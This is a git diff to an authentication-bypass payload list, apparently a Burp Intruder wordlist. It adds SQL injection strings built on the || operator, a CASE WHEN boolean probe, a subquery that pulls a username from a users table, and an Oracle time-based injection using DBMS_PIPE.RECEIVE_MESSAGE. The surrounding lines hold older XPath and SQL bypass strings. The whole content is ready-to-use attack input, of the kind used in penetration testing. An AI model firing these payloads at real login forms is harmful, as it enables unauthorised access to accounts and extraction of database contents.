diff --git a/Intruder/exploit/Auth_Bypass.txt b/Intruder/exploit/Auth_Bypass.txt index 2e6a06a..51f5bdc 100644 --- a/Intruder/exploit/Auth_Bypass.txt +++ b/Intruder/exploit/Auth_Bypass.txt @@ -195,4 +195,13 @@ admin") or "1"="1"/* admin' and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7 ' or 1=1 limit 1 -- -+ -'="or' \ No newline at end of file +'="or' +1' || '1'= '1 +' || '1'='1 +' || '1'='1' -- +' || CASE WHEN (1=1) THEN '1' ELSE '0' END = '1' +' || (SELECT username FROM users LIMIT 1) || ' +' || (SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('A',5) ELSE 'B' END) || ' #Time-Based Injection (Oracle - Using DBMS_PIPE.RECEIVE_MESSAGE) +' || '1' || '=' || '1' +1' || '1'='1'-- +